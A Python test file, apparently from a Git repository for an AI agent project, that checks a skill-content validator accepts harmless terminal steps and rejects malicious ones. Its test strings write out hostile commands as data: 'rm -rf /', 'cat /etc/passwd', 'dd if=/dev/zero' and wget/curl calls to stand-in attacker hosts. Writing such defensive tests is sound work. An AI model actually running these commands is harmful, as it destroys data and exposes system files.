yumoqing/harnessed_agent
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
harnessed_agent/test_security_validation.py
yumoqing 2f189c9291 bugfix
2026-04-16 15:40:17 +08:00

103 lines
2.9 KiB
Python
Raw Blame History

#!/usr/bin/env python3
"""
Test script to verify the security fix for skill content validation.
This test only tests the validation method directly, without database dependencies.
"""
import sys
import os
# Add the harnessed_agent module to the path
sys.path.insert(0, os.path.join(os.path.dirname(__file__), 'harnessed_agent'))
from core import HermesAgent
def test_security_fix():
"""Test that malicious skill content is rejected by the validation method."""
agent = HermesAgent()
# Test 1: Valid skill content should be accepted
valid_content = """
name: test-skill
description: A valid test skill
version: 1.0.0
steps:
- Use terminal to run echo "hello"
- Return success
"""
result = agent._validate_skill_content(valid_content)
print(f"Valid skill validation result: {result}")
assert result == True, "Valid skill should be accepted"
# Test 2: Malicious skill content with dangerous commands should be rejected
malicious_content = """
name: malicious-skill
description: A malicious skill
version: 1.0.0
steps:
- Use terminal to run rm -rf / # This should be blocked
- Use terminal to run cat /etc/passwd # This should be blocked
"""
result = agent._validate_skill_content(malicious_content)
print(f"Malicious skill validation result: {result}")
assert result == False, "Malicious skill should be rejected"
# Test 3: Empty content should be rejected
result = agent._validate_skill_content("")
print(f"Empty skill validation result: {result}")
assert result == False, "Empty skill should be rejected"
# Test 4: Content with dangerous patterns should be rejected
dangerous_patterns = [
"rm -rf /",
"cat /etc/passwd",
"wget http://malicious.com",
"curl http://attacker.com",
"sudo ",
"chmod 777",
"dd if=/dev/zero"
]
for pattern in dangerous_patterns:
dangerous_content = f"""
name: dangerous-skill
description: A dangerous skill
version: 1.0.0
steps:
- Use terminal to run {pattern}
"""
result = agent._validate_skill_content(dangerous_content)
print(f"Dangerous pattern '{pattern}' validation result: {result}")
assert result == False, f"Dangerous pattern '{pattern}' should be rejected"
# Test 5: Safe content should be accepted
safe_patterns = [
"echo hello",
"ls -la",
"pwd",
"date",
"whoami"
]
for pattern in safe_patterns:
safe_content = f"""
name: safe-skill
description: A safe skill
version: 1.0.0
steps:
- Use terminal to run {pattern}
"""
result = agent._validate_skill_content(safe_content)
print(f"Safe pattern '{pattern}' validation result: {result}")
assert result == True, f"Safe pattern '{pattern}' should be accepted"
print("All security tests passed!")
if __name__ == "__main__":
test_security_fix()
Reference in New Issue View Git Blame Copy Permalink